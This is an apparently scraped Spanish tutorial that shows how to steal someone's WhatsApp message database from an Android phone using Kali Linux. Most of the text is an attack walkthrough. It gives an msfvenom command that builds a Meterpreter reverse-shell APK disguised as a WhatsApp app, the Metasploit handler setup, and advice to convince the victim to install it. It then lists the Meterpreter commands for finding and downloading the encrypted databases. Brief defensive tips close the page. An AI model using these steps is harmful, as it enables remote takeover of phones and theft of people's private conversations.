Sei sulla pagina 1di 4

WhatsApp una aplicacin de mensajera donde podemos interactuar con seres queridos y no tan queridos

enviando y recibiendo mensajes. fotos, vdeos etc...

Las conversaciones que tenemos da a da con personas por medio de esta aplicacin de mensajera
adems de verse dentro de la misma aplicacin, quedan guardadas en archivos encriptados dentro del
telfono, en una carpeta predeterminada por WhatsApp.

Si por curiosidad queremos obtener la base de datos encriptada de WhatsApp para ver nuestras
conversaciones en la PC personal, entonces nosotros podramos acceder directamente a ella navegando
en nuestro celular hasta la ruta en que se encuentra el archivo encriptado.

Sin embargo, algunas personas mal intencionadas pueden robar esa informacin de tu Smartphone sin
que te des cuenta, si instalas alguna aplicacin que conceda demasiados permisos.

A continuacin mostrar un mtodo para acceder remotamente a esa base de datos desde Kali Linux.

Empecemos! Con las fechorias.

PROCEDIMIENTO:

Primero antes que nada puedes descargar esta gua: http://ouo.io/EPokCW

De esta forma vers de manera mas prolija como se crea el exploit (Muchas ms imgenes y explicacin
de algunos parmetros que pondremos)

Primero en el Kali Linux abrimos una consola y ponemos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R >


/root/Desktop/AplicacionWhatsapp.apk

En otros post mostrar como utilizar otros payloads, no slamente con meterpreter.

Para saber qu poner en lhost debers abrir otra terminal y ubicar:

ifconfig
Lo subimos a un servidor:

En mi caso lo subo a Mega.nz


Ahora, en la misma terminal abrimos una consola Metasploit con:

msfconsole

Pondremos:

use exploit/multi/handler

Ubicamos los parmetros del exploit que habamos creado anteriormente.

set PAYLOAD android/meterpreter/reverse_tcp


set lhost 192.168.1.2
set lport 7000

Adems despus de eso poner show options para observar que los parmetros estn bien escritos y si nos
falta algo mas.

Abrimos la escucha del Handler con:

exploit

Esperamos que la vctima instale y abra la aplicacin (Para eso tendrn que convencerla que la instale y
ejecute), cuando eso suceda entonces se abrir una sesin Meterpreter.

Ahora van a ubicar:

cd /
Luego de ubicar cd /, van a poner:

ls

ls lo que hace es listar todo lo que est contenido en la carpeta actual, entonces al ubicar ls, nos mostrar
lo que est en la raiz del sistema de Android (Carpeta que accedimos con cd /). Sern muchsimas
carpetas.

Nos meteremos en la Sdcard, y luego listaremos lo que est dentro, con:

cd sdcard
ls

Obtendremos una cantidad enorme de archivos y carpetas, ahora nos interesa la carpeta de WhatsApp y
listar lo que est dentro, por tanto utilizaremos.

cd Whatsapp
ls

OJO que hay que respetar siempre maysculas y minsculas.

Obtendremos las carpetas dentro de WhatsApp, como se ve en WhatsApp hay una carpeta llamada
"Databases", esa es la que contiene los archivos encriptados de los mensajes, por tanto accederemos a l
y listaremos su contenido.

cd Databases
ls

Dentro estarn unos archivos encriptados por Whatsapp, en este caso estn en crypt10, en el dispositivo
que estn tratando puede variar.
Lo que necesitamos es descargar esa base de datos a nuestro Kali Linux, por eso utilizaremos.
download "AQUI ESTAR EL NOMBRE DEL ARCHIVO QUE DESCARGAREMOS"

Entonces ah tendremos la base de datos de WhatsApp de una persona.


Esas bases de datos estarn en la Carpeta Home de Kali Linux.

TERMINADO!

Cmo evitar estos ataques?

* No descargar aplicaciones dudosas.


* No instalar aplicaciones de sitios de dudosa reputacin.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de proteccin de Android (Firewalls, Antivirus etc...)

* Tener WhatsApp actualizado, las nuevas actualizaciones brindan mayor seguridad a la base de datos,
por lo tanto a los hackers se les hace ms difcil su desencriptacin.

Potrebbero piacerti anche